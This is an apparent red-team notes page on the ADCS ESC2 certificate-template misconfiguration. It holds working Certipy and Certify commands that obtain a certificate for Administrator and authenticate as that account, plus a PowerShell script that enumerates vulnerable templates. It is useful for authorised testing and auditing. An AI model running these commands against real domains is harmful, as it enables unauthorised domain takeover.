# ESC2

ESC2 is a variation of [ESC1](https://otter.gitbook.io/red-teaming/notes/adcs/esc1) and requires the following conditions to be met:

* the template defines the Any Purpose EKU (`2.5.29.37.0`), which yields a certificate usable for every purpose (Client Authentication, Code Signing, Certificate Request Agent, ...), or defines no EKU at all
* `ENROLLEE_SUPPLIES_SUBJECT` flag enabled, so the requester chooses the subject and the Subject Alternative Name
* enrollment rights granted to a low-privileged user
* manager approval turned off and no authorized signatures required

To make it easier to remember: the only difference between ESC1 and ESC2 is the required EKU. ESC1 needs an EKU that permits client authentication; ESC2 needs Any Purpose, which implies it. If, for some reason, a certificate template is configured with no EKU at all (as a subordinate CA template is), the resulting certificate is not restricted to any purpose either, so we can use it just like a template with the Any Purpose EKU.

Usually, templates vulnerable to ESC2 can also be exploited exactly like ESC1: to abuse ESC2 we, once again, request a certificate with an alternative user in the Subject Alternative Name of the Certificate Signing Request and authenticate with it. Strictly speaking, the original ESC2 definition does not require `ENROLLEE_SUPPLIES_SUBJECT`: because Any Purpose also covers the Certificate Request Agent EKU, a certificate issued for our own account can still be used as an enrollment agent, as in ESC3, to request a certificate on behalf of another user.

{% code overflow="wrap" %}

```
certipy req -u otter -p 'SomethingSecure123!' -ca otter-CA -template ESC2 -upn Administrator
```

{% endcode %}

{% code overflow="wrap" %}

```
certipy auth -pfx administrator.pfx -username administrator -domain domain.com -dc-ip 10.10.10.10
```

{% endcode %}

We can enumerate the misconfiguration from PowerShell as well. The filter below matches templates that have no manager approval, need no authorized signatures, let the enrollee supply the subject, and either carry the Any Purpose EKU or no EKU at all. It does not check who holds enrollment rights, nor whether a CA actually publishes the template, so those still have to be verified separately.

{% code overflow="wrap" %}

```powershell
# 1.2.840.113556.1.4.804 is the LDAP bitwise-OR matching rule: flag 2 in mspki-enrollment-flag is manager approval,
# flag 1 in mspki-certificate-name-flag is ENROLLEE_SUPPLIES_SUBJECT; 2.5.29.37.0 is the Any Purpose EKU
Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1)(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=domain,DC=com'
```

{% endcode %}
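The one-line filter above stops at the template attributes. The script below is an added example (it is not from the original page or from any tool the page mentions) that goes one step further for the same ESC2 conditions: it decodes the flags, walks each template's security descriptor to see whether a principal a low-privileged account belongs to (Domain Users, Domain Computers, Authenticated Users, Everyone) holds the Certificate-Enrollment extended right, all extended rights or GenericAll, and reports which CA publishes the template. It assumes the RSAT `ActiveDirectory` module and a domain-joined session; no domain, CA or host names are hard-coded.

```powershell
# Added example, not part of the original page: find templates matching the ESC2
# conditions, including the two checks the LDAP one-liner cannot express
# (who can enroll, and which CA publishes the template).
Import-Module ActiveDirectory

$configNC = (Get-ADRootDSE).configurationNamingContext
$pkiBase  = "CN=Public Key Services,CN=Services,$configNC"

# Bit flags and OIDs from the certificate template schema
$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1   # msPKI-Certificate-Name-Flag
$CT_FLAG_PEND_ALL_REQUESTS         = 0x2   # msPKI-Enrollment-Flag: manager approval
$ANY_PURPOSE_EKU                   = '2.5.29.37.0'
$ENROLL_RIGHT_GUID   = [guid]'0e10c968-78fb-11d2-90d4-00c04f79dc55'  # Certificate-Enrollment extended right
$ALL_EXTENDED_RIGHTS = [guid]'00000000-0000-0000-0000-000000000000'  # ACE granting every extended right

# Groups every low-privileged domain account is a member of
$domainSid   = (Get-ADDomain).DomainSID.Value
$lowPrivSids = @("$domainSid-513", "$domainSid-515", 'S-1-5-11', 'S-1-1-0')  # Domain Users, Domain Computers, Authenticated Users, Everyone

# Enrollment Services objects list the templates each CA actually offers
$cas = Get-ADObject -SearchBase "CN=Enrollment Services,$pkiBase" `
    -LDAPFilter '(objectClass=pKIEnrollmentService)' -Properties certificateTemplates, dNSHostName

Get-ADObject -SearchBase "CN=Certificate Templates,$pkiBase" -LDAPFilter '(objectClass=pKICertificateTemplate)' `
    -Properties msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, msPKI-RA-Signature, pKIExtendedKeyUsage, nTSecurityDescriptor |
ForEach-Object {
    $t   = $_
    $eku = @($t.pKIExtendedKeyUsage | Where-Object { $_ })   # absent attribute becomes an empty list

    $anyPurposeOrNone = ($eku.Count -eq 0) -or ($eku -contains $ANY_PURPOSE_EKU)
    $supplySubject    = ($t.'msPKI-Certificate-Name-Flag' -band $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) -ne 0
    $noApproval       = ($t.'msPKI-Enrollment-Flag' -band $CT_FLAG_PEND_ALL_REQUESTS) -eq 0
    $noSignatures     = (-not $t.'msPKI-RA-Signature') -or ($t.'msPKI-RA-Signature' -eq 0)
    if (-not ($anyPurposeOrNone -and $supplySubject -and $noApproval -and $noSignatures)) { return }

    # Allow ACEs that grant enrollment: full GenericAll, the Enroll extended right, or all extended rights
    $genericAll    = [int][System.DirectoryServices.ActiveDirectoryRights]::GenericAll
    $extendedRight = [int][System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
    $enrollers = $t.nTSecurityDescriptor.Access | Where-Object {
        $rights = [int]$_.ActiveDirectoryRights
        $_.AccessControlType -eq 'Allow' -and (
            (($rights -band $genericAll) -eq $genericAll) -or
            ((($rights -band $extendedRight) -ne 0) -and
             ($_.ObjectType -eq $ENROLL_RIGHT_GUID -or $_.ObjectType -eq $ALL_EXTENDED_RIGHTS))
        )
    } | ForEach-Object {
        # Normalise the trustee to a SID so "DOMAIN\Domain Users" and raw SIDs compare the same way
        try { $_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { $_.IdentityReference.Value }
    } | Where-Object { $_ -in $lowPrivSids } | Select-Object -Unique
    if (-not $enrollers) { return }

    # "<CA host>\<CA name>" is the form Certify's /ca: argument expects
    $publishedOn = $cas | Where-Object { $_.certificateTemplates -contains $t.Name } |
        ForEach-Object { "$($_.dNSHostName)\$($_.Name)" }

    [pscustomobject]@{
        Template     = $t.Name
        EKU          = if ($eku.Count) { $eku -join ',' } else { '(none)' }
        EnrollableBy = $enrollers -join ','
        PublishedOn  = if ($publishedOn) { $publishedOn -join ',' } else { '(not published)' }
    }
}
```

A template that is listed with `(not published)` cannot be requested from any CA even though its attributes and ACL are weak, and a template with no EKU is reported explicitly so that it is not mistaken for a clean one. The ACL check only looks at group SIDs every domain account inherits; a template enrollable by a specific user or custom group you control will need that SID added to `$lowPrivSids`.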

Once again, if working in a CBA-patched environment, where the domain controllers enforce strong certificate mapping (KB5014754), a certificate whose only link to the target account is the SAN will not be accepted; it also needs the SID extension. We can ask for it with Certify's `/sidextension` argument (Certipy has an equivalent `-sid` option). Note that Certify expects the CA as `<CA host>\<CA name>`, and that a CA which has itself been patched adds the requester's own SID to issued certificates, so whether a requester-supplied extension is honoured has to be verified against the target CA.

{% code overflow="wrap" %}

```powershell
.\Certify.exe request /ca:domain.com\otter-CA /template:<template_name> /altname:administrator /sidextension:<domain_sid>-500 /domain:otter.com
```

{% endcode %}
